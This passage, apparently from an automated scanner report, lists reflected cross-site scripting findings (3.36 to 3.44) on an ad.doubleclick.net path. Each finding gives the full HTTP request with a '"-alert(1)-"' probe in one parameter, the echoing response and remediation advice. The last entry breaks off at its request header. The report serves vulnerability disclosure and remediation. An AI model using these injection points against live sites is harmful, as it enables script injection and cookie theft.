3.36. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [nd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8ec7"-alert(1)-"ec811ea4808 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be placed inside a JavaScript string literal, it should be encoded for that context before insertion, with every character outside [A-Za-z0-9] replaced by its \xHH or \uHHHH escape, so that a double quote, backslash, line terminator or </script> sequence in the input cannot end the literal; HTML entity encoding alone does not help inside a script block. The parameter should also be validated against the format the ad server actually expects for it, and the same treatment is needed for every other click0 sub-parameter reflected by this path. Because the response is an HTML document served by ad.doubleclick.net, the injected script runs in that origin, not the embedding publisher's, and can read any of that host's cookies that are not flagged HttpOnly, such as those sent in the request below.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431f8ec7"-alert(1)-"ec811ea4808&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431f8ec7"-alert(1)-"ec811ea4808&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.2
...[SNIP]...

3.37. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89d47"-alert(1)-"6396b7e7268 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be placed inside a JavaScript string literal, it should be encoded for that context before insertion, with every character outside [A-Za-z0-9] replaced by its \xHH or \uHHHH escape, so that a double quote, backslash, line terminator or </script> sequence in the input cannot end the literal; HTML entity encoding alone does not help inside a script block. The parameter should also be validated against the format the ad server actually expects for it, and the same treatment is needed for every other click0 sub-parameter reflected by this path. Because the response is an HTML document served by ad.doubleclick.net, the injected script runs in that origin, not the embedding publisher's, and can read any of that host's cookies that are not flagged HttpOnly, such as those sent in the request below.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a89d47"-alert(1)-"6396b7e7268&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
f%3B240390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a89d47"-alert(1)-"6396b7e7268&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.1
...[SNIP]...

3.38. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [oepartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b749"-alert(1)-"284c75e823e was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be placed inside a JavaScript string literal, it should be encoded for that context before insertion, with every character outside [A-Za-z0-9] replaced by its \xHH or \uHHHH escape, so that a double quote, backslash, line terminator or </script> sequence in the input cannot end the literal; HTML entity encoding alone does not help inside a script block. The parameter should also be validated against the format the ad server actually expects for it, and the same treatment is needed for every other click0 sub-parameter reflected by this path. Because the response is an HTML document served by ad.doubleclick.net, the injected script runs in that origin, not the embedding publisher's, and can read any of that host's cookies that are not flagged HttpOnly, such as those sent in the request below.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=4b749"-alert(1)-"284c75e823e&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:24:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
log.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=4b749"-alert(1)-"284c75e823e&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl
...[SNIP]...

3.39. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [orh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e34b9"-alert(1)-"c75c4a6b53f was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be placed inside a JavaScript string literal, it should be encoded for that context before insertion, with every character outside [A-Za-z0-9] replaced by its \xHH or \uHHHH escape, so that a double quote, backslash, line terminator or </script> sequence in the input cannot end the literal; HTML entity encoding alone does not help inside a script block. The parameter should also be validated against the format the ad server actually expects for it, and the same treatment is needed for every other click0 sub-parameter reflected by this path. Because the response is an HTML document served by ad.doubleclick.net, the injected script runs in that origin, not the embedding publisher's, and can read any of that host's cookies that are not flagged HttpOnly, such as those sent in the request below.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.come34b9"-alert(1)-"c75c4a6b53f&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:24:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.come34b9"-alert(1)-"c75c4a6b53f&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");

...[SNIP]...

3.40. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbafa"-alert(1)-"4555ba63b5f was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be placed inside a JavaScript string literal, it should be encoded for that context before insertion, with every character outside [A-Za-z0-9] replaced by its \xHH or \uHHHH escape, so that a double quote, backslash, line terminator or </script> sequence in the input cannot end the literal; HTML entity encoding alone does not help inside a script block. The parameter should also be validated against the format the ad server actually expects for it, and the same treatment is needed for every other click0 sub-parameter reflected by this path. Because the response is an HTML document served by ad.doubleclick.net, the injected script runs in that origin, not the embedding publisher's, and can read any of that host's cookies that are not flagged HttpOnly, such as those sent in the request below.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2cbafa"-alert(1)-"4555ba63b5f&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2cbafa"-alert(1)-"4555ba63b5f&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.24
...[SNIP]...

3.41. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pdom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 329f1"-alert(1)-"4602bfcd0de was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be placed inside a JavaScript string literal, it should be encoded for that context before insertion, with every character outside [A-Za-z0-9] replaced by its \xHH or \uHHHH escape, so that a double quote, backslash, line terminator or </script> sequence in the input cannot end the literal; HTML entity encoding alone does not help inside a script block. The parameter should also be validated against the format the ad server actually expects for it, and the same treatment is needed for every other click0 sub-parameter reflected by this path. Because the response is an HTML document served by ad.doubleclick.net, the injected script runs in that origin, not the embedding publisher's, and can read any of that host's cookies that are not flagged HttpOnly, such as those sent in the request below.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com329f1"-alert(1)-"4602bfcd0de&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
72%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com329f1"-alert(1)-"4602bfcd0de&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

3.42. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f20"-alert(1)-"5e0c335e6a0 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be placed inside a JavaScript string literal, it should be encoded for that context before insertion, with every character outside [A-Za-z0-9] replaced by its \xHH or \uHHHH escape, so that a double quote, backslash, line terminator or </script> sequence in the input cannot end the literal; HTML entity encoding alone does not help inside a script block. The parameter should also be validated against the format the ad server actually expects for it, and the same treatment is needed for every other click0 sub-parameter reflected by this path. Because the response is an HTML document served by ad.doubleclick.net, the injected script runs in that origin, not the embedding publisher's, and can read any of that host's cookies that are not flagged HttpOnly, such as those sent in the request below.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M12f20"-alert(1)-"5e0c335e6a0&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:26:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
t=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M12f20"-alert(1)-"5e0c335e6a0&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

3.43. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c9ce"-alert(1)-"2ecdc88be42 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be placed inside a JavaScript string literal, it should be encoded for that context before insertion, with every character outside [A-Za-z0-9] replaced by its \xHH or \uHHHH escape, so that a double quote, backslash, line terminator or </script> sequence in the input cannot end the literal; HTML entity encoding alone does not help inside a script block. The parameter should also be validated against the format the ad server actually expects for it, and the same treatment is needed for every other click0 sub-parameter reflected by this path. Because the response is an HTML document served by ad.doubleclick.net, the injected script runs in that origin, not the embedding publisher's, and can read any of that host's cookies that are not flagged HttpOnly, such as those sent in the request below.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=3c9ce"-alert(1)-"2ecdc88be42&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
1862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=3c9ce"-alert(1)-"2ecdc88be42&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.
...[SNIP]...

3.44. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77531"-alert(1)-"44f2f7f79cf was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be placed inside a JavaScript string literal, it should be encoded for that context before insertion, with every character outside [A-Za-z0-9] replaced by its \xHH or \uHHHH escape, so that a double quote, backslash, line terminator or </script> sequence in the input cannot end the literal; HTML entity encoding alone does not help inside a script block. The parameter should also be validated against the format the ad server actually expects for it, and the same treatment is needed for every other click0 sub-parameter reflected by this path. Because the response is an HTML document served by ad.doubleclick.net, the injected script runs in that origin, not the embedding publisher's, and can read any of that host's cookies that are not flagged HttpOnly, such as those sent in the request below.

Request

